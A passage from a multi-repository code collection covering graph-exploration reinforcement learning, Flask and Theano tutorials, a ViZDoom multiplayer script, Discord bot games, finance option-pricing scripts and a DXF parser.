arr = self.store[key]
col += 1
if t > 0:
previous_node = arr[t-1]
x[previous_node, col] = neg
current_node = arr[t]
if current_node >= 0: # -1 means None
x[current_node, col] = pos
class CategoricalOfflineMemory(OfflineGraphMemory):
"""Maintain events history, so that graph state of any time step can be reconstructed"""
def __init__(self, max_nodes, max_edges, max_episode_steps, history, features, pos_label, neg_label):
super().__init__(max_nodes, max_edges, max_episode_steps, pos_label, neg_label)
self.history = history
self.cat_features = features
# features 'CYF' + cat_features = {B, D, N}
self.feat_flags = {key: flag in features for flag, key in zip("BDN", self.extra_keys)}
self.num_features = 3 + sum(self.feat_flags.values())
self.list_of_path_nodes = [None] * (max_episode_steps + 1)
self.dim_node = history * self.num_features
def update(self, partial_graph_obs: GoalPartialObservation):
super().update(partial_graph_obs)
def sample(self, t: int) -> GraphObservation:
# retrieve graph state at time t
m = self.edge_counts[t]
n = self.node_counts[t]
discovery_times = self.discovery_times[:n]
visit_times = self.visit_times[:n]
# get nodes discovered time step
discovery_times = discovery_times.reshape(n, 1)
# get nodes visited time step
visitation_times = visit_times.reshape(n, 1)
# update node features in place
pos = self.pos_label
neg = self.neg_label
h = self.history
d = self.num_features
D = self.dim_node # D = d * h
# time steps
timesteps = np.arange(t-h+1, t+1) # [t-3, t-2, t-1, t] for h=4
# discovered feature (v in U)
discovered_mask = discovery_times <= timesteps # [N, H]
# visited feature (v in C)
visited_mask = visitation_times <= timesteps # [N, H]
# frontier feature (v in F) = discovered but not (yet) visited
frontier_mask = discovered_mask & ~visited_mask # [N, H]
# current feature (v == v_t)
# current_mask = visitation_times == timesteps # [N, H]
# F C Y B D N
x = np.full(shape=(n, D), fill_value=neg, dtype=np.float32)
for j in range(h):
timestep = t-h+1+j
if timestep >= 0:
# C: visited set
col = j * d # [0, d, 2d]
M = visited_mask[:, j]
x[M, col] = pos
# Y: current node
col += 1
# M = current_mask[:, j]
v = self.visited_seq[timestep]
x[v, col] = pos
if 'X' in self.cat_features:
x[v, col-1] = neg
# F: frontier set
col += 1
M = frontier_mask[:, j]
x[M, col] = pos
# BDN
for key in self.extra_keys:
if self.feat_flags[key]:
arr = self.store[key]
col += 1
current_node = arr[timestep]
if current_node >= 0: # -1 means None
x[current_node, col] = pos
# frontier
frontier = np.where(frontier_mask[:, -1])[0]
obs = GraphObservation(x=x,
edge_index=self.edge_index[:, :m],
frontier=frontier,
visited_seq=self.visited_seq[:t+1]
)
return obs
```
#### File: noge/policies/q_policy.py
```python
import torch
import numpy as np
from noge.data_types import GoalPartialObservation, NeuralGraphObservation, InferenceSample
class GraphDQNPolicy:
def __init__(self, network, graph_memory, preprocessor, exploration_schedule=None, device='cpu'):
self.network = network
self.graph_memory = graph_memory
self.preprocessor = preprocessor
self.exploration_schedule = exploration_schedule
self.device = device
self._is_collecting = exploration_schedule is not None
def __call__(self, partial_obs: GoalPartialObservation) -> int:
# EnvObservation (PartialGraphObservation) -> GraphObservation
self.graph_memory.update(partial_obs)
frontier = self.graph_memory.get_frontier()
frontier_size = len(frontier)
# if there is only a single option, we don't need to forward pass
if frontier_size == 1:
return frontier[0]
# if it is the first time step, all options should be equally likely
t = partial_obs['t']
if t == 0:
i = np.random.randint(frontier_size)
return frontier[i]
# exploration: only for behavioral policy (collection phase)
if self._is_collecting:
u = np.random.rand()
if u < self.exploration_schedule.current:
i = np.random.randint(frontier_size)
return frontier[i]
# (epsilon < u) or this is an inference policy (evaluation phase)
# graph
graph_obs = self.graph_memory.get()
torch_graph_obs = {k: torch.from_numpy(v).to(self.device) for k, v in graph_obs.items()}
neural_graph_obs = NeuralGraphObservation(**torch_graph_obs)
# measurement
encoded_meas = self.preprocessor.transform_meas(partial_obs['meas'])
# network input
net_input = InferenceSample(graph_obs=neural_graph_obs, meas=encoded_meas, goal=None)
# forward pass
with torch.no_grad():
q = self.network(net_input) # [A, 1]
# DFP policy
frontier_node_index = q.argmax().item() # a
# map index to frontier nodes
node = frontier[frontier_node_index]
return node
```
#### File: noge/trainers/dfp_trainer.py
```python
import torch
import numpy as np
from noge.data_types import DFPReplayBatch, DFPTrainingBatch, Transition
from noge.trainers.base_trainer import Trainer
from noge.trainers.replay_buffer import Replay
class DFPReplay(Replay):
def __init__(self, capacity, ob_space, graph_mem_config, future_steps, min_horizon=4):
super().__init__(capacity, ob_space, graph_mem_config, min_horizon)
assert 'goal' in ob_space.spaces
self.future_steps = future_steps
# make normal numpy arrays for measurements and goals
goal_space = ob_space.spaces['goal']
self._goals = np.empty(shape=(capacity, *goal_space.shape), dtype=goal_space.dtype)
def push(self, transition: Transition):
obs = transition.obs
# push goal before calling superclass to get the right 'pointer'
self._goals[self._pointer] = obs['goal']
if transition.terminal:
next_pointer = (self._pointer + 1) % self.capacity
self._goals[next_pointer] = transition.next_obs['goal']
super().push(transition)
def sample(self, batch_size: int) -> DFPReplayBatch:
valid_idx = self._sample_valid_indices(batch_size)
# retrieve / copy from storage
graph_obses = self._graphs_buffer.get(valid_idx)
measurements = self._measurements[valid_idx] # [B, M, Dm]
goals = self._goals[valid_idx]
actions = self._actions[valid_idx]
# make targets
targets, targets_mask = self._make_targets(valid_idx)
# make replay batch according to data protocol
sample_batch = DFPReplayBatch(graph_obses=graph_obses,
measurements=measurements,
goals=goals,
actions=actions,
targets=targets,
targets_mask=targets_mask)
return sample_batch
def _make_targets(self, indices: np.ndarray):
# sample measurements
measurements = self._measurements # [N, Dm]
meas_t = measurements[indices] # [B, Dm]
meas_t = np.expand_dims(meas_t, 1) # [B, 1, Dm]
# get future measurements at t + dt
future_times = indices.reshape(-1, 1) + self.future_steps
future_times = future_times % self.capacity # [B, T]
future_meas = measurements[future_times] # [B, T, Dm]
# mark future measurements as invalid if they are from a different episode
episode_idx = self._episode_idx[indices].reshape(-1, 1) # [B, 1]
future_episode_idx = self._episode_idx[future_times] # [B, T]
valid_times_mask = future_episode_idx == episode_idx # [B, T]
# make targets: y = m_{t+dt} - m_t
targets = future_meas - meas_t # [B, T, Dm]
# reshape targets mask [B, T] --> [B, T, Dm]
B, T, D = targets.shape
targets_mask = valid_times_mask.reshape(B, T, 1) # [B, T, 1]
targets_mask = np.tile(targets_mask, (1, 1, D)) # [B, T, Dm]
return targets, targets_mask
class DFPTrainer(Trainer):
def preprocess_batch(self, batch: DFPReplayBatch) -> DFPTrainingBatch:
# preprocess list of dicts
graph_obses = [self.graph_obs_fn(graph_obs) for graph_obs in batch.graph_obses]
# most arrays can be directly moved to torch
measurements = self.preprocessor.transform_meas(batch.measurements)
goals = torch.from_numpy(batch.goals).to(self.device)
actions = torch.from_numpy(batch.actions).to(self.device)
# targets can be rescaled
targets, targets_mask = self.preprocessor.transform_target(batch.targets, batch.targets_mask)
# make training batch as defined in data protocol
train_batch = DFPTrainingBatch(graph_obses=graph_obses,
measurements=measurements,
goals=goals,
actions=actions,
targets=targets,
targets_mask=targets_mask)
return train_batch
def step(self, batch_size=None):
B = batch_size or self.batch_size
replay_batch: DFPReplayBatch = self.replay_buffer.sample(B)
train_batch: DFPTrainingBatch = self.preprocess_batch(replay_batch)
self.network.train()
predictions = self.network(train_batch) # [B, D_goal]
targets = train_batch.targets # [B, T=D_goal]
target_masks = train_batch.targets_mask # [B, T=D_goal]
num_targets = targets.numel()
num_valid_targets = target_masks.sum().item()
# compute loss
loss = self.criterion(predictions, targets, target_masks)
# do gradient step
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if self.scheduler is not None:
self.scheduler.step()
loss_sum = loss.item()
full_loss = loss_sum / num_targets
valid_loss = loss_sum / num_valid_targets
# log stats
d = dict(pred_loss=full_loss, valid_pred_loss=valid_loss)
self.train_metrics.append(d)
self.num_train_steps += 1
```
#### File: noge/trainers/dqn_trainer.py
```python
import torch
import copy
from noge.data_types import ReplayBatch, TrainingBatch, InferenceSample
from noge.trainers.base_trainer import Trainer
class DQNTrainer(Trainer):
def __init__(self, gamma, target_update_freq, replay_buffer, batch_size, network, preprocessor,
criterion, optimizer, scheduler=None, device='cpu'):
super().__init__(replay_buffer, batch_size, network, preprocessor, criterion, optimizer, scheduler, device)
self.gamma = gamma
self.target_update_freq = target_update_freq
self.target_net = copy.deepcopy(network).to(self.device)
self.target_net.eval()
def preprocess_batch(self, batch: ReplayBatch) -> TrainingBatch:
# preprocess list of dicts
graph_obses = [self.graph_obs_fn(graph_obs) for graph_obs in batch.graph_obses]
next_graph_obses = [self.graph_obs_fn(graph_obs) for graph_obs in batch.next_graph_obses]
# most arrays can be directly moved to torch
measurements = self.preprocessor.transform_meas(batch.measurements)
next_measurements = self.preprocessor.transform_meas(batch.next_measurements)
actions = torch.from_numpy(batch.actions).to(self.device)
rewards = torch.from_numpy(batch.rewards).to(self.device)
mask = torch.from_numpy(batch.mask).to(self.device)
# make training batch as defined in data protocol
train_batch = TrainingBatch(graph_obses=graph_obses,
measurements=measurements,
actions=actions,
rewards=rewards,
next_graph_obses=next_graph_obses,
next_measurements=next_measurements,
goals=None,
mask=mask)
return train_batch
def step(self, batch_size=None):
B = batch_size or self.batch_size
replay_batch: ReplayBatch = self.replay_buffer.sample(B)
train_batch: TrainingBatch = self.preprocess_batch(replay_batch)
self.network.train()
q_sa = self.network(train_batch) # [B, 1]
q_next = []
with torch.no_grad():
for go, meas in zip(train_batch.next_graph_obses, train_batch.next_measurements):
sample = InferenceSample(graph_obs=go, meas=meas.unsqueeze(0), goal=None)
q_next_i = self.target_net(sample) # [N_i, 1]
q_next.append(q_next_i.max(0)[0])
q_next = torch.cat(q_next) # [B,]
q_next = train_batch.mask * q_next # [B,]
q_target = train_batch.rewards + self.gamma * q_next # [B,]
loss = self.criterion(q_sa, q_target.reshape(B, 1))
# do gradient step
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
if self.scheduler is not None:
self.scheduler.step()
# log stats
self.train_metrics.append(dict(q_loss=loss.item()))
self.num_train_steps += 1
if self.num_train_steps % self.target_update_freq == 0:
self.target_net.load_state_dict(self.network.state_dict())
``` |
{
"source": "JohnyCook12/Flask_example",
"score": 3
} |
#### File: JohnyCook12/Flask_example/api.py
```python
from flask import Flask, url_for, render_template, request, jsonify
from flask_restful import Resource, Api
app = Flask(__name__)
api = Api(app)
class HelloWorld(Resource):
def get(self):
return {'about':"Hello World introduction"}
def post(self):
some_json = request.get_json()
return {'You send': some_json}, 201
class Multiply10(Resource):
def get(self, num):
return {'vysledek': num*10}
api.add_resource(HelloWorld,'/')
api.add_resource(Multiply10,'/multi/<int:num>')
# ========================== RUN ======================
if __name__ == '__main__':
app.run(debug=True)
```
#### File: JohnyCook12/Flask_example/hello.py
```python
from flask import Flask, url_for, render_template
app = Flask(__name__) # default run function is app. Name = this file name
print(__name__)
@app.route('/') # url of index.
def index():
return f'Hello from Flask!.....URL pro index: {url_for("pers")}'
my_age = 32
@app.route('/osobni') # route 1
@app.route('/personal/') # route 2 (for same page)
@app.route('/pers_info') # route 3
def pers():
return f'Hello! Name: Johny, city: Prague, Age: {my_age}'
### DYNAMICKÉ ROUTY ###
username = 'Johny' # DYNAMIC ROUTEs:
@app.route(f'/user/<username>/') # var in format <variable>
def profile(username):
return f'This is infopage about user {username}:'
@app.route('/url/') # GENERATE URL
def show_url():
return url_for('profile', username='hroncok') # First arg = name of function that generate dynamic route. Second arg = argument required in d. route.
@app.route('/defaultni_url/')
def make_url():
return url_for('pers','hello')
### SABLONY ###
@app.route('/hello/')
@app.route('/hello/<name>/')
def hello(name=None):
return render_template('hello.html', name=name) # loads from TEMPLATES folder
@app.route('/bububu/')
def bububu():
return render_template('bubu.html') # loads from TEMPLATES folder
@app.route('/hlavni/')
def hlavni_page():
return render_template('hlavni_stranka.html')
# ========================== RUN ======================
if __name__ == '__main__':
app.run(debug=True)
```
#### File: JohnyCook12/Flask_example/recognize_sound.py
```python
from flask import Flask, url_for, render_template, request, redirect
import speech_recognition as sr
app = Flask(__name__)
@app.route('/speech/', methods=["GET", "POST"]) # speech recognition
def speech_page():
try:
if request.method == "POST": # some file uploaded
print("FORM DATA RECEIVED")
if "my_file" not in request.files: # NO FILE uploaded
return redirect(request.url)
file = request.files["my_file"]
if file.filename == "": # FILE BLANK
return redirect(request.url)
if file: # PROCESSING the file
try:
recognizer = sr.Recognizer() # create Recognizer instance
audio_file = sr.AudioFile(file) # convert file to audio
with audio_file as source:
data = recognizer.record(source)
result_text = recognizer.recognize_google(data, key=None, language="cs") # recognize text
print(result_text)
return render_template('speech.html', content=result_text, result_content=result_text)
except Exception:
return render_template('speech.html', result_content="No file")
else:
return render_template('speech.html') # this is return when method is GET
except Exception: # Any error
return render_template('speech.html', result_content="something is missing")
# ========================== RUN ======================
if __name__ == '__main__':
app.run(debug=True, threaded=True)
``` |
{
"source": "johny-c/theano_exercises",
"score": 3
} |
#### File: 01_basics/01_building_expressions/02_vector_mat_soln.py
```python
import numpy as np
from theano import function
import theano.tensor as T
def make_vector():
"""
Returns a new Theano vector.
"""
return T.vector()
def make_matrix():
"""
Returns a new Theano matrix.
"""
return T.matrix()
def elemwise_mul(a, b):
"""
a: A theano matrix
b: A theano matrix
Returns the elementwise product of a and b
"""
return a * b
def matrix_vector_mul(a, b):
"""
a: A theano matrix
b: A theano vector
Returns the matrix-vector product of a and b
"""
return T.dot(a, b)
if __name__ == "__main__":
a = make_vector()
b = make_vector()
c = elemwise_mul(a, b)
d = make_matrix()
e = matrix_vector_mul(d, c)
f = function([a, b, d], e)
rng = np.random.RandomState([1, 2, 3])
a_value = rng.randn(5).astype(a.dtype)
b_value = rng.rand(5).astype(b.dtype)
c_value = a_value * b_value
d_value = rng.randn(5, 5).astype(d.dtype)
expected = np.dot(d_value, c_value)
actual = f(a_value, b_value, d_value)
assert np.allclose(actual, expected)
print "SUCCESS!"
```
#### File: 01_basics/02_compiling_and_running/02_shared.py
```python
import numpy as np
raise NotImplementedError("TODO: add any other imports you need")
def make_shared(shape):
"""
Returns a theano shared variable containing a tensor of the specified
shape.
You can use any value you want.
"""
raise NotImplementedError("TODO: implement the function")
def exchange_shared(a, b):
"""
a: a theano shared variable
b: a theano shared variable
Uses get_value and set_value to swap the values stored in a and b
"""
raise NotImplementedError("TODO: implement the function")
def make_exchange_func(a, b):
"""
a: a theano shared variable
b: a theano shared variable
Returns f
where f is a theano function, that, when called, swaps the
values in a and b
f should not return anything
"""
raise NotImplementedError("TODO: implement the function")
if __name__ == "__main__":
a = make_shared((5, 4, 3))
assert a.get_value().shape == (5, 4, 3)
b = make_shared((5, 4, 3))
assert a.get_value().shape == (5, 4, 3)
a.set_value(np.zeros((5, 4, 3), dtype=a.dtype))
b.set_value(np.ones((5, 4, 3), dtype=b.dtype))
exchange_shared(a, b)
assert np.all(a.get_value() == 1.)
assert np.all(b.get_value() == 0.)
f = make_exchange_func(a, b)
rval = f()
assert isinstance(rval, list)
assert len(rval) == 0
assert np.all(a.get_value() == 0.)
assert np.all(b.get_value() == 1.)
print "SUCCESS!"
``` |
{
"source": "johny-c/ViZDoom",
"score": 3
} |
#### File: examples/python/multiple_instances.py
```python
from __future__ import print_function
from random import choice
from vizdoom import *
# For multiplayer game use process (ZDoom's multiplayer sync mechanism prevents threads to work as expected).
from multiprocessing import Process
# For singleplayer games threads can also be used.
# from threading import Thread
# Run this many episodes
episodes = 10
def player1():
game = DoomGame()
# game.load_config('../../scenarios/basic.cfg')
# or
game.load_config('../../scenarios/multi_duel.cfg')
game.add_game_args("-host 2 -deathmatch +timelimit 1 +sv_spawnfarthest 1")
game.add_game_args("+name Player1 +colorset 0")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
for i in range(episodes):
print("Episode #" + str(i + 1))
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Episode finished!")
print("Player1 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
# Starts a new episode. All players have to call new_episode() in multiplayer mode.
game.new_episode()
game.close()
def player2():
game = DoomGame()
# game.load_config('../config/basic.cfg')
# or
game.load_config('../../scenarios/multi_duel.cfg')
game.add_game_args("-join 127.0.0.1")
game.add_game_args("+name Player2 +colorset 3")
game.init()
actions = [[True, False, False], [False, True, False], [False, False, True]]
for i in range(episodes):
while not game.is_episode_finished():
if game.is_player_dead():
game.respawn_player()
game.make_action(choice(actions))
print("Player2 frags:", game.get_game_variable(GameVariable.FRAGCOUNT))
game.new_episode()
game.close()
# p1 = Thread(target = player1)
# p1.start()
if __name__ == '__main__':
p1 = Process(target=player1)
p1.start()
player2()
print("Done")
``` |
{
"source": "johnydough/Discord-Bot",
"score": 3
} |
#### File: Discord-Bot/cogs/jokes.py
```python
import discord
from discord.ext import commands
import pyjokes
class Jokes(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(brief="tells a joke", description="tells a joke")
async def joke(self, ctx):
await ctx.send(pyjokes.get_joke())
def setup(bot):
bot.add_cog(Jokes(bot))
```
#### File: Discord-Bot/cogs/scramble.py
```python
import discord
from discord.ext import commands
import random
import asyncio
from media.drawings import *
class Scramble(commands.Cog):
def __init__(self, bot):
self.bot = bot
def get_word(self):
lines = open("media/word_list").readlines()
word = random.choice(lines)
word = word[:-1]
print(word)
return word
@commands.command(aliases=['scrmble', 'scrm', 'scrim', 'scram', 'scramb', 'scrambl', 'scr', 'scrabble'], description= "scramble game")
async def scramble(self, ctx):
word = self.get_word()
shuffled = ''.join(random.sample(word, len(word)))
blanks = ''
for i in range(len(shuffled)):
blanks += '_ '
board = await ctx.send(f"Click the inbox to attempt the entire word\n```Letters left: {' '.join(shuffled)}\n{blanks}```")
message_reactions = []
reaction_to_word = ""
for i in shuffled:
await board.add_reaction(DICT_ALPHABET[i])
message_reactions.append(DICT_ALPHABET[i])
await board.add_reaction(BACK_EMOJI)
await board.add_reaction(STOP_EMOJI)
await board.add_reaction(WORD_EMOJI)
message_reactions.append(BACK_EMOJI)
message_reactions.append(STOP_EMOJI)
message_reactions.append(WORD_EMOJI)
not_finished = True
not_wrong_guess = True
self.bot.loop.create_task(self.scramble_loop(ctx, word, not_finished, message_reactions, reaction_to_word, blanks, board, shuffled, not_wrong_guess))
def check_word(self, word, blanks, not_wrong_guess):
blanks = blanks.replace(' ', '')
if blanks != word:
not_wrong_guess = False
else:
not_wrong_guess = True
return not_wrong_guess
async def scramble_loop(self, ctx, word, not_finished, message_reactions, reaction_to_word, blanks, board, shuffled, not_wrong_guess):
while not_finished and not_wrong_guess:
def check(reaction, user):
return user == ctx.author and str(reaction.emoji) in message_reactions
try:
reaction, user = await self.bot.wait_for('reaction_add', timeout=60.0, check=check)
message = reaction.message
except asyncio.TimeoutError:
return await ctx.send(f"{ctx.author.mention}'s word was not guessed in time\nthe word was `{word}`")
else:
try:
await message.remove_reaction(reaction, user)
except:
pass
if reaction.emoji == STOP_EMOJI:
not_finished = False
return await board.edit(content = f"```Game ended...\nThe word was {word}```")
if reaction.emoji == WORD_EMOJI:
await board.edit(content = f"```Letters left: {' '.join(shuffled)}\nYou have 5 seconds to guess the word:```")
def check(m):
return m.author == ctx.author and m.channel == ctx.channel
try:
guess = await self.bot.wait_for('message', timeout=5.0, check=check)
if guess.content.lower() == word:
not_finished = False
blanks = " ".join(word)
break
else:
await ctx.send(f"Incorrect guess! You can try again by clicking {WORD_EMOJI} or you can just guess by reactions", delete_after=3.2)
except:
await ctx.send(f"You didn't guess in time! You can try again by clicking {WORD_EMOJI} or you can just guess by reactions", delete_after=3.2)
for char, emote in DICT_ALPHABET.items():
if char in shuffled:
if reaction.emoji == emote:
reaction_to_word += f"{char}"
blanks = blanks.replace(' ', '')
blanks = blanks[:len(reaction_to_word)-1] + char + blanks[len(reaction_to_word):]
blanks = " ".join(blanks)
shuffled = shuffled.replace(char, '', 1)
if reaction.emoji == BACK_EMOJI:
char = reaction_to_word[-1]
reaction_to_word = reaction_to_word[:-1]
blanks = blanks.replace(' ', '')
blanks = blanks[:len(reaction_to_word)] + '_' + blanks[len(reaction_to_word)+1:]
blanks = " ".join(blanks)
shuffled += char
if blanks.replace(' ', '') == word:
not_finished = False
if '_' not in blanks:
not_wrong_guess = self.check_word(word, blanks, not_wrong_guess)
await board.edit(content=f"```Letters left: {' '.join(shuffled)}\n{blanks}```")
if not not_wrong_guess:
await board.edit(
content=f'Wrong word foo lmao'
f'\n{user.mention} The word was "{word}"```\n{blanks}```')
if not not_finished:
await board.edit(content=f'{user.mention} has used the totality of their intellectual prowess and unscrambled the scrambled word'
f'\nThe word was "{word}"```\n{blanks}```')
return
def setup(bot):
bot.add_cog(Scramble(bot))
``` |
{
"source": "John-ye666/Python-for-Finance-Second-Edition",
"score": 3
} |
#### File: Python-for-Finance-Second-Edition/Chapter02/c2_09_bsCall.py
```python
def bsCall(S,X,T,r,sigma):
from scipy import log,exp,sqrt,stats
d1=(log(S/X)+(r+sigma*sigma/2.)*T)/(sigma*sqrt(T))
d2 = d1-sigma*sqrt(T)
return S*stats.norm.cdf(d1)-X*exp(-r*T)*stats.norm.cdf(d2)
```
#### File: Python-for-Finance-Second-Edition/Chapter08/c8_36_Fama_Mecbeth_regression.py
```python
import numpy as np
import pandas as pd
import statsmodels.api as sm
from datetime import datetime
#
n = 252
np.random.seed(12345)
begdate=datetime(2013, 1, 2)
dateRange = pd.date_range(begdate, periods=n)
def makeDataFrame():
data=pd.DataFrame(np.random.randn(n,7),columns=['A','B','C','D','E',' F','G'],
index=dateRange)
return data
#
data = { 'A': makeDataFrame(), 'B': makeDataFrame(), 'C': makeDataFrame() }
Y = makeDataFrame()
print(pd.fama_macbeth(y=Y,x=data))
```
#### File: Python-for-Finance-Second-Edition/Chapter10/c10_13_fig.py
```python
from scipy import exp,sqrt,stats,arange,ones
from matplotlib import pyplot as plt
import numpy as np
z=0.325
def f(x):
return stats.norm.cdf(x)
x = arange(-3,3,0.1)
y1=f(x)
y2=ones(len(x))*0.5
x3=[0,0]
y3=[0,1]
plt.plot(x,y1)
plt.plot(x, y2, 'b-')
plt.plot(x3,y3)
plt.annotate('f(z)=f('+str(z)+') is '+str(np.round(f(z),4)),xy=(z,f(z)), xytext=(z-3,f(z)), arrowprops=dict(facecolor='red',shrink=0.01))
plt.annotate('z is '+str(z),xy=(z,0),xytext=(1.5,0.3), arrowprops=dict(facecolor='blue',shrink=0.01))
plt.show()
```
#### File: Python-for-Finance-Second-Edition/Chapter10/c10_22_binomial_graph.py
```python
import networkx as nx
import matplotlib.pyplot as plt
#
plt.figtext(0.08,0.6,"Stock price=$20")
plt.figtext(0.75,0.91,"Stock price=$22")
plt.figtext(0.75,0.87,"Option price=$1")
plt.figtext(0.75,0.28,"Stock price=$18")
plt.figtext(0.75,0.24,"Option price=0")
n=1
def binomial_grid(n):
G=nx.Graph()
for i in range(0,n+1):
for j in range(1,i+2):
if i<n:
G.add_edge((i,j),(i+1,j))
G.add_edge((i,j),(i+1,j+1))
posG={}
for node in G.nodes():
posG[node]=(node[0],n+2+node[0]-2*node[1])
nx.draw(G,pos=posG)
binomial_grid(n)
plt.show()
```
#### File: Python-for-Finance-Second-Edition/Chapter10/c10_33_implied_vol_EuropeanPut_min.py
```python
from scipy import log,exp,sqrt,stats
def implied_vol_put_min(S,X,T,r,p):
implied_vol=1.0
min_value=100.0
for i in xrange(1,10000):
sigma=0.0001*(i+1)
d1=(log(S/X)+(r+sigma*sigma/2.)*T)/(sigma*sqrt(T))
d2 = d1-sigma*sqrt(T)
put=X*exp(-r*T)*stats.norm.cdf(-d2)-S*stats.norm.cdf(-d1)
abs_diff=abs(put-p)
if abs_diff<min_value:
min_value=abs_diff
implied_vol=sigma
k=i
put_out=put
print 'k, implied_vol, put, abs_diff'
return k,implied_vol, put_out,min_value
```
#### File: Python-for-Finance-Second-Edition/Chapter10/c10_39_implied_vol_binary_search.py
```python
from scipy import log,exp,sqrt,stats
S=42;X=40;T=0.5;r=0.01;c=3.0
def bsCall(S,X,T,r,sigma):
d1=(log(S/X)+(r+sigma*sigma/2.)*T)/(sigma*sqrt(T))
d2 = d1-sigma*sqrt(T)
return S*stats.norm.cdf(d1)-X*exp(-r*T)*stats.norm.cdf(d2)
#
def impliedVolBinary(S,X,T,r,c):
k=1
volLow=0.001
volHigh=1.0
cLow=bsCall(S,X,T,r,volLow)
cHigh=bsCall(S,X,T,r,volHigh)
if cLow>c or cHigh<c:
raise ValueError
while k ==1:
cLow=bsCall(S,X,T,r,volLow)
cHigh=bsCall(S,X,T,r,volHigh)
volMid=(volLow+volHigh)/2.0
cMid=bsCall(S,X,T,r,volMid)
if abs(cHigh-cLow)<0.01:
k=2
elif cMid>c:
volHigh=volMid
else:
volLow=volMid
return volMid, cLow, cHigh
#
print("Vol, cLow, cHigh")
print(impliedVolBinary(S,X,T,r,c))
```
#### File: Python-for-Finance-Second-Edition/Chapter14/c14_06_binary_call.py
```python
import random
import scipy as sp
#
def terminalStockPrice(S, T,r,sigma):
tao=random.gauss(0,1.0)
terminalPrice=S * sp.exp((r - 0.5 * sigma**2)*T+sigma*sp.sqrt(T)*tao)
return terminalPrice
#
def binaryCallPayoff(x, sT,payoff):
if sT >= x:
return payoff
else:
return 0.0
# input area
S = 40.0 # asset price
x = 40.0 # exericse price
T = 0.5 # maturity in years
r = 0.01 # risk-free rate
sigma = 0.2 # vol of 20%
fixedPayoff = 10.0 # payoff
nSimulations =10000 # number of simulatins
#
payoffs=0.0
for i in xrange(nSimulations):
sT = terminalStockPrice(S, T,r,sigma)
payoffs += binaryCallPayoff(x, sT,fixedPayoff)
#
price = sp.exp(-r * T) * (payoffs / float(nSimulations))
print('Binary options call= %.8f' % price)
```
#### File: Python-for-Finance-Second-Edition/Chapter14/c14_18_down_and_in_put.py
```python
def down_and_in_put(s0,x,T,r,sigma,n_simulation,barrier):
n_steps=100.
dt=T/n_steps
total=0
for j in range(0, n_simulation):
sT=s0
in_=False
for i in range(0,int(n_steps)):
e=sp.random.normal()
sT*=sp.exp((r-0.5*sigma*sigma)*dt+sigma*e*sp.sqrt(dt))
if sT<barrier:
in_=True
#print 'sT=',sT
#print 'j=',j ,'out=',out if in_==True:
total+=p4f.bs_put(s0,x,T,r,sigma)
return total/n_simulation
#
```
#### File: Python-for-Finance-Second-Edition/Chapter15/c15_07_equal_vol_2periods.py
```python
import numpy as np
import scipy as sp
import pandas as pd
from matplotlib.finance import quotes_historical_yahoo_ochl as getData
#
# input area
ticker='F' # stock
begdate1=(1982,9,1) # starting date for period 1
enddate1=(1987,9,1) # ending date for period 1
begdate2=(1987,12,1) # starting date for period 2
enddate2=(1992,12,1) # ending date for period 2
#
# define a function
def ret_f(ticker,begdate,enddate):
p =getData(ticker, begdate, enddate,asobject=True, adjusted=True)
ret = p.aclose[1:]/p.aclose[:-1]-1
date_=p.date
return pd.DataFrame(data=ret,index=date_[1:],columns=['ret'])
#
# call the above function twice
ret1=ret_f(ticker,begdate1,enddate1)
ret2=ret_f(ticker,begdate2,enddate2)
#
# output
print('Std period #1 vs. std period #2')
print(round(sp.std(ret1.ret),6),round(sp.std(ret2.ret),6))
print('T value , p-value ')
print(sp.stats.bartlett(ret1.ret,ret2.ret))
``` |
{
"source": "JohnyEngine/CNC",
"score": 3
} |
#### File: heekspython/examples/dxf_to_heekspython.py
```python
import math
##########################
#
# parse the dxf file
#
##########################
def _parsepair(a):
"""Parse a pair of lines containing 'group code' and 'value'."""
groupcode = a.next().strip()
value = a.next().strip()
return (groupcode, value)
def _gotosection(a, secname):
"""Go to secname and stop."""
while 1:
gc, val = _parsepair(a)
if gc == '2' and val == secname:
return
def _get_units(a):
"""Parse through HEADER section and detect whether units
are set for metric(1) or english(0)."""
_gotosection(a, 'HEADER')
units = 0 # assume inches by default
while 1:
gc, val = _parsepair(a)
if gc == '9' and val == '$MEASUREMENT':
gc, val = _parsepair(a)
if gc == '70':
units = int(val)
elif gc == '0' and val == 'ENDSEC':
return units
def _process_entity(a):
"""Return a dictionary of groupcodes : values for the next
entity in the ENTITIES section. Go until groupcode == 0."""
entitydict = {}
flag = 1
while 1:
gc, val = _parsepair(a)
if gc == '0':
if val == 'ENDSEC':
flag = 0 # Done with ENTITIES section
return (entitydict, flag, val)
else:
entitydict[gc] = val
def _parse_file(f):
"""Parse contents of the dxf file, looking for units and
all the drawing entities."""
a = iter(open(f))
units = _get_units(a)
_gotosection(a, 'ENTITIES')
lines = []
circles = []
arcs = []
entities = [lines, circles, arcs]
gc, val = _parsepair(a)
while 1:
if val == 'LINE':
ed, f, val = _process_entity(a)
lines.append(ed)
#print 'line\n'
elif val == 'CIRCLE':
ed, f, val = _process_entity(a)
circles.append(ed)
#print 'circle\n'
elif val == 'ARC':
ed, f, val = _process_entity(a)
arcs.append(ed)
#print 'arc\n'
else:
ed, f, val = _process_entity(a)
if not f:
return (units, entities)
##########################
#
# dxf to HeeksPython
# DF added 10/31/10
##########################
def gen_heekspython_entities(f,sketch_num):
"""Generate HeeksPython objects from dxf entities."""
units, entities = _parse_file(f)
lines, circles, arcs = entities
if units:
scale = 1.0
else:
scale = 25.4
mldict = {}
mcdict = {}
madict = {}
k = 0
i = 0
collector=[]
collector.append("cad.sketch()\n")
collector.append("sketch"+str(sketch_num)+" = cad.getlastobj()\n")
for line in lines:
p1 = (float(line['10'])*scale,
float(line['20'])*scale)
p2 = (float(line['11'])*scale,
float(line['21'])*scale)
coords = (p1, p2)
#print"#Line,"+str(p1[0])+","+str(p1[1])+",0,"+str(p2[0])+","+str(p2[1])+",0\n"
collector.append("cad.line("+str(p1[0])+","+str(p1[1])+","+str(p2[0])+","+str(p2[1])+")\n")
collector.append("i"+str(i)+"= cad.getlastobj()\n")
collector.append("cad.add(sketch"+str(sketch_num)+",i"+str(i)+")\n")
i+=1
k+=1
mldict[k] = coords
string = "".join(collector)
k = 0
for circ in circles:
cntr = (float(circ['10'])*scale,
